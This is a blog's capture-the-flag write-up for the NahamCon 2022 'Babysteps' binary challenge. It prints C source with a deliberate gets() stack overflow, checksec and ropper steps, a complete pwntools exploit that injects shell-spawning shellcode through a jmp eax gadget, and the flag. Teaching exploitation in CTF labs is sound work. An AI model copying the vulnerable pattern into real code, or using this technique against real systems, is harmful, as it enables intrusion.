<!doctype html>
<html lang="en-us">
  <head>
    <title>[NAHAMCONCTF] Babysteps // Tzion</title>
    <link rel="shortcut icon" href="/favicon.ico" />
    <meta charset="utf-8" />
    <meta name="generator" content="Hugo 0.104.1" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="Tzion" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="https://tzion0.github.io/css/main.min.e1fda2b3aeeaca02fa5b7c35a05438808bf1292a3bb0de84260054c1a9cf3aca.css" />

    
    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="[NAHAMCONCTF] Babysteps"/>
<meta name="twitter:description" content="Task source: https://github.com/Tzion0/CTF/tree/master/NahamConCTF/2022/Binary_Exploitation/Babysteps
Description Become a baby! Take your first steps and jump around with BABY SIMULATOR 9000!
This challenge provided a C source code and its binary.
The C source code:
#include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;sys/stat.h&gt; #define BABYBUFFER 16 void setup(void) { setbuf(stdout, NULL); setbuf(stdin, NULL); } void whine() { puts(&#34;You whine: &#39;WAAAAAAHHHH!! WAAH, WAAHH, WAAAAAAHHHH&#39;\n&#34;); } void scream() { puts(&#34;You scream: &#39;WAAAAAAHHHH!! WAAH, WAAHH, WAAAAAAHHHH&#39;\n&#34;); } void cry() { puts(&#34;You cry: &#39;WAAAAAAHHHH!"/>

    <meta property="og:title" content="[NAHAMCONCTF] Babysteps" />
<meta property="og:description" content="Task source: https://github.com/Tzion0/CTF/tree/master/NahamConCTF/2022/Binary_Exploitation/Babysteps
Description Become a baby! Take your first steps and jump around with BABY SIMULATOR 9000!
This challenge provided a C source code and its binary.
The C source code:
#include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;sys/stat.h&gt; #define BABYBUFFER 16 void setup(void) { setbuf(stdout, NULL); setbuf(stdin, NULL); } void whine() { puts(&#34;You whine: &#39;WAAAAAAHHHH!! WAAH, WAAHH, WAAAAAAHHHH&#39;\n&#34;); } void scream() { puts(&#34;You scream: &#39;WAAAAAAHHHH!! WAAH, WAAHH, WAAAAAAHHHH&#39;\n&#34;); } void cry() { puts(&#34;You cry: &#39;WAAAAAAHHHH!" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://tzion0.github.io/posts/nahamconctf2022-babysteps/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2022-05-01T00:00:00+00:00" />
<meta property="article:modified_time" content="2022-05-01T00:00:00+00:00" />



  </head>
  <body>
    <header class="app-header">
      <a href="https://tzion0.github.io/"><img class="app-header-avatar" src="/avatar.jpg" alt="Tzion" /></a>
      <h1>Tzion</h1>
      <nav class="app-header-menu">
          <a class="app-header-menu-item" href="/about/">About</a>
             - 
          
          <a class="app-header-menu-item" href="/posts/">Blog</a>
             - 
          
          <a class="app-header-menu-item" href="/tags/">Tags</a>
      </nav>
      <p>Yet Another Infosec Blog, Enjoy!</p>
      <div class="app-header-social">
        
          <a href="https://twitter.com/Tzion0" target="_blank" rel="noreferrer noopener">
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-twitter">
  <title>My Twitter</title>
  <path d="M23 3a10.9 10.9 0 0 1-3.14 1.53 4.48 4.48 0 0 0-7.86 3v1A10.66 10.66 0 0 1 3 4s-4 9 5 13a11.64 11.64 0 0 1-7 2c9 5 20 0 20-11.5a4.5 4.5 0 0 0-.08-.83A7.72 7.72 0 0 0 23 3z"></path>
</svg>
          </a>
        
          <a href="https://github.com/Tzion0" target="_blank" rel="noreferrer noopener">
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-github">
  <title>My Github</title>
  <path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22"></path>
</svg>
          </a>
        
      </div>
    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <h1 class ="post-title">[NAHAMCONCTF] Babysteps</h1>
      <div class="post-meta">
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-calendar">
  <title>calendar</title>
  <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line>
</svg>
          May 1, 2022
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-clock">
  <title>clock</title>
  <circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline>
</svg>
          3 min read
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-tag">
  <title>tag</title>
  <path d="M20.59 13.41l-7.17 7.17a2 2 0 0 1-2.83 0L2 12V2h10l8.59 8.59a2 2 0 0 1 0 2.82z"></path><line x1="7" y1="7" x2="7.01" y2="7"></line>
</svg>
              <a class="tag" href="https://tzion0.github.io/tags/nahamconctf/">NAHAMCONCTF</a>
              <a class="tag" href="https://tzion0.github.io/tags/2022/">2022</a>
              <a class="tag" href="https://tzion0.github.io/tags/binexp/">BinExp</a>
        </div>
      </div>
    </header>
    <div class="post-content">
      <h3 id="task-source">Task source:</h3>
<p><a href="https://github.com/Tzion0/CTF/tree/master/NahamConCTF/2022/Binary_Exploitation/Babysteps">https://github.com/Tzion0/CTF/tree/master/NahamConCTF/2022/Binary_Exploitation/Babysteps</a></p>
<h3 id="description">Description</h3>
<p>Become a baby! Take your first steps and jump around with BABY SIMULATOR 9000!</p>
<p>This challenge provided a C source code and its binary.</p>
<p>The C source code:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;stdio.h&gt;</span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;stdlib.h&gt;</span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;sys/stat.h&gt;</span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#define BABYBUFFER 16
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">void</span> <span style="color:#a6e22e">setup</span>(<span style="color:#66d9ef">void</span>) {
</span></span><span style="display:flex;"><span>    setbuf(stdout, NULL);
</span></span><span style="display:flex;"><span>    setbuf(stdin, NULL);
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">void</span> <span style="color:#a6e22e">whine</span>() {
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;You whine: &#39;WAAAAAAHHHH!! WAAH, WAAHH, WAAAAAAHHHH&#39;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>);
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">void</span> <span style="color:#a6e22e">scream</span>() {
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;You scream: &#39;WAAAAAAHHHH!! WAAH, WAAHH, WAAAAAAHHHH&#39;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>);
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">void</span> <span style="color:#a6e22e">cry</span>() {
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;You cry: &#39;WAAAAAAHHHH!! WAAH, WAAHH, WAAAAAAHHHH&#39;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>);
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">void</span> <span style="color:#a6e22e">sleep</span>() {
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;Night night, baby!</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>);
</span></span><span style="display:flex;"><span>  exit(<span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>);
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">void</span> <span style="color:#a6e22e">ask_baby_name</span>() {
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">char</span> buffer[BABYBUFFER];
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;First, what is your baby name?&#34;</span>);
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">return</span> gets(buffer);
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">int</span> <span style="color:#a6e22e">main</span>(<span style="color:#66d9ef">int</span> argc, <span style="color:#66d9ef">char</span> <span style="color:#f92672">**</span>argv){
</span></span><span style="display:flex;"><span>  setup();
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;              _)_&#34;</span>);
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;           .-&#39;(/ &#39;-.&#34;</span>);
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;          /    `    </span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">&#34;</span>);
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;         /  -     -  </span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">&#34;</span>);
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;        (`  a     a  `)&#34;</span>);
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;         </span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">     ^     /&#34;</span>);
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;          &#39;. &#39;---&#39; .&#39;&#34;</span>);
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;          .-`&#39;---&#39;`-.&#34;</span>);
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;         /           </span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">&#34;</span>);
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;        /  / &#39;   &#39; </span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">  </span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">&#34;</span>);
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;      _/  /|       |</span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">  </span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">_&#34;</span>);
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;     `/|</span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">` |+++++++|`/|</span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">`&#34;</span>);
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;          /</span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">       /</span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">&#34;</span>);
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;          | `-._.-` |&#34;</span>);
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;          </span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">   / </span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">   /&#34;</span>);
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;          |_ |   | _|&#34;</span>);
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;          | _|   |_ |&#34;</span>);
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;          (ooO   Ooo)&#34;</span>);
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;&#34;</span>);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;=== BABY SIMULATOR 9000 ===&#34;</span>);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;How&#39;s it going, babies!!&#34;</span>);
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;Are you ready for the adventure of a lifetime? (literally?)&#34;</span>);
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;&#34;</span>);
</span></span><span style="display:flex;"><span>  ask_baby_name();
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;Pefect! Now let&#39;s get to being a baby!</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">char</span> menu_option;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">do</span>{
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    puts(<span style="color:#e6db74">&#34;CHOOSE A BABY ACTIVITY&#34;</span>);
</span></span><span style="display:flex;"><span>    puts(<span style="color:#e6db74">&#34;a. Whine&#34;</span>);
</span></span><span style="display:flex;"><span>    puts(<span style="color:#e6db74">&#34;b. Cry&#34;</span>);
</span></span><span style="display:flex;"><span>    puts(<span style="color:#e6db74">&#34;c. Scream&#34;</span>);
</span></span><span style="display:flex;"><span>    puts(<span style="color:#e6db74">&#34;d. Throw a temper tantrum&#34;</span>);
</span></span><span style="display:flex;"><span>    puts(<span style="color:#e6db74">&#34;e. Sleep.&#34;</span>);
</span></span><span style="display:flex;"><span>    scanf(<span style="color:#e6db74">&#34; %c&#34;</span>,<span style="color:#f92672">&amp;</span>menu_option);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">switch</span>(menu_option){
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">case</span> <span style="color:#e6db74">&#39;a&#39;</span><span style="color:#f92672">:</span>
</span></span><span style="display:flex;"><span>        whine();
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">break</span>;
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">case</span> <span style="color:#e6db74">&#39;b&#39;</span><span style="color:#f92672">:</span>
</span></span><span style="display:flex;"><span>        cry();
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">break</span>;
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">case</span> <span style="color:#e6db74">&#39;c&#39;</span><span style="color:#f92672">:</span>
</span></span><span style="display:flex;"><span>        scream();
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">break</span>;
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">case</span> <span style="color:#e6db74">&#39;d&#39;</span><span style="color:#f92672">:</span>
</span></span><span style="display:flex;"><span>        scream();
</span></span><span style="display:flex;"><span>        cry();
</span></span><span style="display:flex;"><span>        whine();
</span></span><span style="display:flex;"><span>        cry();
</span></span><span style="display:flex;"><span>        scream();
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">break</span>;
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">case</span> <span style="color:#e6db74">&#39;e&#39;</span><span style="color:#f92672">:</span>
</span></span><span style="display:flex;"><span>        sleep();
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">break</span>;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">default</span><span style="color:#f92672">:</span>
</span></span><span style="display:flex;"><span>        puts(<span style="color:#e6db74">&#34;WAAAAAAHHHH, THAT NO-NO!!!</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>);
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">break</span>;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  }<span style="color:#66d9ef">while</span>(menu_option <span style="color:#f92672">!=</span><span style="color:#e6db74">&#39;e&#39;</span>);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Looking at the source code, we can see there is a BOF vulnerability lies at a function called <code>ask_baby_name</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">void</span> <span style="color:#a6e22e">ask_baby_name</span>() {
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">char</span> buffer[BABYBUFFER];
</span></span><span style="display:flex;"><span>  puts(<span style="color:#e6db74">&#34;First, what is your baby name?&#34;</span>);
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">return</span> gets(buffer);
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>It asking for the baby name using <code>gets()</code> function which is insecure and the size of the buffer was set to 16 bytes which can be see here:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#75715e">#define BABYBUFFER 16
</span></span></span></code></pre></div><h2 id="exploitation">Exploitation</h2>
<p>First, we need to check any protections in this binary, we can use <code>checksec</code> for that, the result is:</p>
<pre tabindex="0"><code>Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX disabled
PIE:      No PIE (0x8048000)
RWX:      Has RWX segments
</code></pre><p>From the output we can see it was a 32-bit binary and NX is disabled means that we can execute shellcode in the binary. The next step is we find the offset before overflowing the return function as we need to jmp to the shellcode we specify later, we use Cyclic for that and the offset was 28.</p>
<p>The next step we need to know is where and how we jump to. While debugging, we found that our provided input will be storing in EAX, which can be seen in the picture below:</p>
<p><img src="/img/nahamconctf2022-babysteps/nahamcon-pwn.png" alt="IMG"></p>
<p>With that being said, now we just need to find gadget to jmp to EAX, we can use <code>ropper</code> do that:</p>
<pre tabindex="0"><code>ropper -f babysteps --search jmp
</code></pre><p><img src="/img/nahamconctf2022-babysteps/nahamcon-pwn2.png" alt="IMG"></p>
<p>With all of the information we gathered, the final exploit script is:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-py" data-lang="py"><span style="display:flex;"><span><span style="color:#f92672">from</span> pwn <span style="color:#f92672">import</span> <span style="color:#f92672">*</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>exe <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;./babysteps&#39;</span>
</span></span><span style="display:flex;"><span>elf <span style="color:#f92672">=</span> context<span style="color:#f92672">.</span>binary <span style="color:#f92672">=</span> ELF(exe, checksec<span style="color:#f92672">=</span><span style="color:#66d9ef">False</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Start program</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#io = remote(&#34;challenge.nahamcon.com&#34;,31983)</span>
</span></span><span style="display:flex;"><span>io <span style="color:#f92672">=</span> process(exe)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>offset <span style="color:#f92672">=</span> <span style="color:#ae81ff">28</span>  
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>shellcode <span style="color:#f92672">=</span> asm(shellcraft<span style="color:#f92672">.</span>sh())
</span></span><span style="display:flex;"><span>shellcode <span style="color:#f92672">+=</span> asm(shellcraft<span style="color:#f92672">.</span>exit())
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>jmp_eax <span style="color:#f92672">=</span> asm(<span style="color:#e6db74">&#39;jmp eax&#39;</span>)
</span></span><span style="display:flex;"><span>jmp_eax <span style="color:#f92672">=</span> next(elf<span style="color:#f92672">.</span>search(jmp_eax))
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Build payload </span>
</span></span><span style="display:flex;"><span>payload <span style="color:#f92672">=</span> flat([
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x90</span><span style="color:#e6db74">&#34;</span><span style="color:#f92672">*</span>offset,
</span></span><span style="display:flex;"><span>    jmp_eax,
</span></span><span style="display:flex;"><span>    shellcode,
</span></span><span style="display:flex;"><span>])
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>write(<span style="color:#e6db74">&#39;payload&#39;</span>, payload)
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Send the payload</span>
</span></span><span style="display:flex;"><span>io<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;name?</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>io<span style="color:#f92672">.</span>sendline(payload)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Get our shell</span>
</span></span><span style="display:flex;"><span>io<span style="color:#f92672">.</span>interactive()
</span></span></code></pre></div><p>From script above we basically use <code>shellcraft</code> to generate shellcode to spawn shell for us. For the payload structure, since this is 32-bit binary, we first overflow to the return function with NOP (&quot;\x90&quot;), then jmp_eax which means jump to the NOP we provided earlier, and the shellcode was after the NOP, hence it get executed.</p>
<p>Result:</p>
<p><img src="/img/nahamconctf2022-babysteps/nahamcon-pwn3.png" alt="IMG"></p>
<p>Flag:</p>
<pre tabindex="0"><code>flag{7d4ce4594f7511f8d7d6d0b1edd1a162}
</code></pre>
    </div>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
